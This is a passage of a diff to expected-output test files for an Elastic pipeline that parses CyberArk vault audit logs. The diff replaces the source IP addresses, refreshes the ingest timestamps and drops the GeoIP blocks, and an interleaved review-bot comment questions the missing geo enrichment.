 "preserve_original_event"
@@ -40,7 +28,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -50,7 +38,7 @@
 "iso_timestamp": "2021-03-10T09:11:54Z",
 "file": "Root\\PSMPApp_localhost.localdomain.LiveSessions",
 "safe": "PSMPLiveSessions",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Create File Version",
 "message": "Create File Version",
 "issuer": "PSMPApp_localhost.localdomain",
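Review bot: The new expected output at `@@ -7,20 +7,8 @@` drops `source.geo` entirely for `67.43.156.13` rather than replacing the Barcelona enrichment with whatever the test GeoIP data returns for the supported range; the same happens in the hunks at `-77`, `-147`, `-217` (67.43.156.14), `-345` and `-483` (67.43.156.15). If the point of moving to the supported subset is deterministic GeoIP enrichment, an expected file with no `geo` object no longer exercises the geoip processor at all, so a regression that silently disabled it in the pipeline would pass these tests. It is worth confirming whether these files were regenerated against a stack without the GeoIP database loaded; if so, regenerating with it present should restore a `geo` block for each of the three addresses, and if the absence is intended, a sentence in the PR description explaining why `source.geo` is now absent would spare the next reader the same question.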
@@ -64,8 +52,8 @@
 "event": {
 "severity": 2,
 "action": "create file version",
- "ingested": "2021-06-09T10:24:36.502246900Z",
- "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:09.726762400Z",
+ "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
 "code": "62",
 "kind": "event"
 }
@@ -77,20 +65,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -110,7 +86,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -120,7 +96,7 @@
 "iso_timestamp": "2021-03-10T17:58:05Z",
 "file": "Root\\SessionControl",
 "safe": "PSMNotifications",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Create File Version",
 "message": "Create File Version",
 "issuer": "Administrator",
@@ -134,8 +110,8 @@
 "event": {
 "severity": 2,
 "action": "create file version",
- "ingested": "2021-06-09T10:24:36.502258900Z",
- "original": "\u003c5\u003e1 2021-03-10T17:58:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:05\",\"IsoTimestamp\":\"2021-03-10T17:58:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMNotifications\",\"File\":\"Root\\\\SessionControl\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:09.726766Z",
+ "original": "\u003c5\u003e1 2021-03-10T17:58:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:05\",\"IsoTimestamp\":\"2021-03-10T17:58:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMNotifications\",\"File\":\"Root\\\\SessionControl\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
 "code": "62",
 "kind": "event"
 }
@@ -147,20 +123,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -180,7 +144,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -190,7 +154,7 @@
 "iso_timestamp": "2021-03-10T18:46:47Z",
 "file": "Root\\PSMServer.LiveSessions",
 "safe": "PSMLiveSessions",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Create File Version",
 "message": "Create File Version",
 "issuer": "PSMApp_VAGRANT",
@@ -204,8 +168,8 @@
 "event": {
 "severity": 2,
 "action": "create file version",
- "ingested": "2021-06-09T10:24:36.502260800Z",
- "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:09.726770700Z",
+ "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
 "code": "62",
 "kind": "event"
 }
@@ -217,19 +181,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -249,7 +202,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -259,7 +212,7 @@
 "iso_timestamp": "2021-03-10T22:20:12Z",
 "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions",
 "safe": "PSMLiveSessions",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Create File Version",
 "message": "Create File Version",
 "issuer": "PSMApp_ASR-WIN",
@@ -273,8 +226,8 @@
 "event": {
 "severity": 2,
 "action": "create file version",
- "ingested": "2021-06-09T10:24:36.502262200Z",
- "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:09.726776900Z",
+ "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}",
 "code": "62",
 "kind": "event"
 }
@@ -332,7 +285,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502263800Z", + "ingested": "2021-12-09T13:37:09.726781900Z", "original": "\u003c5\u003e1 2021-03-11T16:50:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:29\",\"IsoTimestamp\":\"2021-03-11T16:50:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File 
Version\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -345,20 +298,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -378,7 +319,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -388,8 +329,8 @@ "iso_timestamp": "2021-03-11T16:59:58Z", "file": "Root\\PSMPApp_VAGRANT.LiveSessions", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Create File Version", "message": "Create File Version", "issuer": "PSMPApp_VAGRANT", 
@@ -403,8 +344,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502265100Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Create File 
Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726787Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } 
@@ -470,7 +411,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502266400Z", + "ingested": "2021-12-09T13:37:09.726791100Z", "original": "\u003c5\u003e1 2021-03-14T12:07:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedDiscoveryLogs\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:32\",\"IsoTimestamp\":\"2021-03-14T12:07:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File 
Version\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedDiscoveryLogs\",\"File\":\"Root\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "62", "kind": "event" @@ -483,17 +424,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -513,7 +445,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -523,8 +455,8 @@ "iso_timestamp": "2021-03-14T12:57:27Z", "file": "Root\\PSMPApp_SSH.LiveSessions", "safe": "PSMPLiveSessions", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n 